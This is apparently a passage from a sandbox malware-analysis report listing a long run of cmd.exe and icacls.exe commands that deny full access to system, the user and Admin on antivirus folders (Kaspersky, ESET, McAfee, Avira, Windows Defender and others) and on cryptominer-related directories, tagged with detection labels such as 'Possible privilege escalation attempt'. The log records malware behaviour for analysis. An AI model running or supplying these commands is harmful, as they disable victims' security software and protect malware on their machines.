C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Norton" /deny Admin:(OI)(CI)(F)3⤵
- Possible privilege escalation attempt
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\Kaspersky Lab" /deny Admin:(OI)(CI)(F)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny Admin:(OI)(CI)(F)3⤵
- Possible privilege escalation attempt
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Kaspersky Lab" /deny Admin:(OI)(CI)(F)3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Kaspersky Lab" /deny Admin:(OI)(CI)(F)3⤵
- Possible privilege escalation attempt
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Doctor Web" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Doctor Web" /deny Admin:(OI)(CI)(F)3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\grizzly" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\grizzly" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Cezurity" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Cezurity" /deny Admin:(OI)(CI)(F)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Cezurity" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Cezurity" /deny Admin:(OI)(CI)(F)3⤵
- Possible privilege escalation attempt
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\McAfee" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\McAfee" /deny Admin:(OI)(CI)(F)3⤵
- Possible privilege escalation attempt
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Avira" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Avira" /deny Admin:(OI)(CI)(F)3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Package Cache" /deny System:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Package Cache" /deny System:(OI)(CI)(F)3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Package Cache" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Package Cache" /deny Admin:(OI)(CI)(F)3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny Admin:(OI)(CI)(F)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\ESET" /deny Admin:(OI)(CI)(F)3⤵
- Possible privilege escalation attempt
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\ESET" /deny Admin:(OI)(CI)(F)3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Panda Security" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Panda Security" /deny Admin:(OI)(CI)(F)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\windows\syswow64\xmr64 /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\windows\syswow64\xmr64 /deny Admin:(OI)(CI)(F)3⤵
- Possible privilege escalation attempt
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\windows\system32\xmr /deny system:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\windows\system32\xmr /deny system:(OI)(CI)(F)3⤵
- Possible privilege escalation attempt
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\windows\syswow64\xmr64 /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\windows\syswow64\xmr64 /deny Admin:(OI)(CI)(F)3⤵
- Possible privilege escalation attempt
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\windows\system32\xmr /deny system:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\windows\system32\xmr /deny system:(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\windows\windowsnode /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\windows\windowsnode /deny Admin:(OI)(CI)(F)3⤵
- Possible privilege escalation attempt
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\windows\windowsnode /deny system:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\windows\windowsnode /deny system:(OI)(CI)(F)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\programdata\GOOGLE /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\programdata\GOOGLE /deny Admin:(OI)(CI)(F)3⤵
- Possible privilege escalation attempt
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\windows\syswow64\hhsm /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\windows\syswow64\hhsm /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\windows\hhsm /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\windows\hhsm /deny Admin:(OI)(CI)(F)3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\programdata\{CB28D9D3-6B5D-4AFA-BA37-B4AFAABF70B8} /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\programdata\{CB28D9D3-6B5D-4AFA-BA37-B4AFAABF70B8} /deny Admin:(OI)(CI)(F)3⤵
- Possible privilege escalation attempt
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\programdata\Cefunpacked /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\programdata\Cefunpacked /deny Admin:(OI)(CI)(F)3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\programdata\prefssecure /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\programdata\prefssecure /deny Admin:(OI)(CI)(F)3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls c:\programdata\MicrosoftCorporation /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls c:\programdata\MicrosoftCorporation /deny Admin:(OI)(CI)(F)3⤵
- Possible privilege escalation attempt
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\programdata\tiser /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\programdata\tiser /deny Admin:(OI)(CI)(F)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Windowsdata /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Windowsdata /deny Admin:(OI)(CI)(F)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls D:\Windowsdata /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls D:\Windowsdata /deny Admin:(OI)(CI)(F)3⤵
- Possible privilege escalation attempt
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls E:\Windowsdata /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls E:\Windowsdata /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls K:\Windowsdata /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls K:\Windowsdata /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\Windowsdata /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\Windowsdata /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\disk /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\disk /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Logs /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Logs /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls c:\windows\min /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls c:\windows\min /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\windows\hs_module /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\windows\hs_module /deny Admin:(OI)(CI)(F)3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\programdata\oracle /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\programdata\oracle /deny Admin:(OI)(CI)(F)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\programdata\WindowsSQL /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\programdata\WindowsSQL /deny Admin:(OI)(CI)(F)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\programdata\DirectX11b /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\programdata\DirectX11b /deny Admin:(OI)(CI)(F)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\Framework /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\Framework /deny Admin:(OI)(CI)(F)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\programdata\system32 /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\programdata\system32 /deny Admin:(OI)(CI)(F)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\programdata\AudioHDriver /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\programdata\AudioHDriver /deny Admin:(OI)(CI)(F)3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\programdata\windowsdriver /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\programdata\windowsdriver /deny Admin:(OI)(CI)(F)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Windows\WindowsDefender /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\WindowsDefender /deny Admin:(OI)(CI)(F)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\programdata\DriversI /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\programdata\DriversI /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\windows\system32\hs /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\windows\system32\hs /deny Admin:(OI)(CI)(F)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\windows\rss /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\windows\rss /deny Admin:(OI)(CI)(F)3⤵
- Possible privilege escalation attempt
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Local\generictools /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Users\Admin\AppData\Local\generictools /deny Admin:(OI)(CI)(F)3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Local\PCBooster /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Users\Admin\AppData\Local\PCBooster /deny Admin:(OI)(CI)(F)3⤵
- Possible privilege escalation attempt
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Local\unityp /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Users\Admin\AppData\Local\unityp /deny Admin:(OI)(CI)(F)3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Local\AMD /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Users\Admin\AppData\Local\AMD /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Local\xmarin /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Users\Admin\AppData\Local\xmarin /deny Admin:(OI)(CI)(F)3⤵
- Possible privilege escalation attempt
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Local\comdev /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Users\Admin\AppData\Local\comdev /deny Admin:(OI)(CI)(F)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Local\wupdate /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Users\Admin\AppData\Local\wupdate /deny Admin:(OI)(CI)(F)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Local\monotype /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Users\Admin\AppData\Local\monotype /deny Admin:(OI)(CI)(F)3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Local\xpon /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Users\Admin\AppData\Local\xpon /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Local\wmipr /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Users\Admin\AppData\Local\wmipr /deny Admin:(OI)(CI)(F)3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Local\kara /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Users\Admin\AppData\Local\kara /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Local\syslog /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Users\Admin\AppData\Local\syslog /deny Admin:(OI)(CI)(F)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Local\temp\wup /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Users\Admin\AppData\Local\temp\wup /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Local\FileSystemDriver /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Users\Admin\AppData\Local\FileSystemDriver /deny Admin:(OI)(CI)(F)3⤵
- Possible privilege escalation attempt
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Local\geckof /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Users\Admin\AppData\Local\geckof /deny Admin:(OI)(CI)(F)3⤵
- Possible privilege escalation attempt
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Local\initwin /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Users\Admin\AppData\Local\initwin /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Local\packagest /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Users\Admin\AppData\Local\packagest /deny Admin:(OI)(CI)(F)3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\subdir /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Users\Admin\AppData\Roaming\subdir /deny Admin:(OI)(CI)(F)3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\syscore /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Users\Admin\AppData\Roaming\syscore /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\windowscore /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Users\Admin\AppData\Roaming\windowscore /deny Admin:(OI)(CI)(F)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\Macromedia /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Users\Admin\AppData\Roaming\Macromedia /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\microsoft software /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Users\Admin\AppData\Roaming\microsoft software /deny Admin:(OI)(CI)(F)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\SystemCertificates /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Users\Admin\AppData\Roaming\SystemCertificates /deny Admin:(OI)(CI)(F)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\microsoft\Speech /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Users\Admin\AppData\Roaming\microsoft\Speech /deny Admin:(OI)(CI)(F)3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\coretempapp /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Users\Admin\AppData\Roaming\coretempapp /deny Admin:(OI)(CI)(F)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\kryptex /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Users\Admin\AppData\Roaming\kryptex /deny Admin:(OI)(CI)(F)3⤵
- Possible privilege escalation attempt
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\system /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Users\Admin\AppData\Roaming\system /deny Admin:(OI)(CI)(F)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\WindowsApps /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Users\Admin\AppData\Roaming\WindowsApps /deny Admin:(OI)(CI)(F)3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\WindowsHelper /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Users\Admin\AppData\Roaming\WindowsHelper /deny Admin:(OI)(CI)(F)3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\systemprocess /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Users\Admin\AppData\Roaming\systemprocess /deny Admin:(OI)(CI)(F)3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\microsoft\windows defender /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Users\Admin\AppData\Roaming\microsoft\windows defender /deny Admin:(OI)(CI)(F)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\systemprocess /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Users\Admin\AppData\Roaming\systemprocess /deny Admin:(OI)(CI)(F)3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\microsoft\network /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Users\Admin\AppData\Roaming\microsoft\network /deny Admin:(OI)(CI)(F)3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\gplyra /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Users\Admin\AppData\Roaming\gplyra /deny Admin:(OI)(CI)(F)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\intel /deny %username%:(OI)(CI)(F)2⤵
-
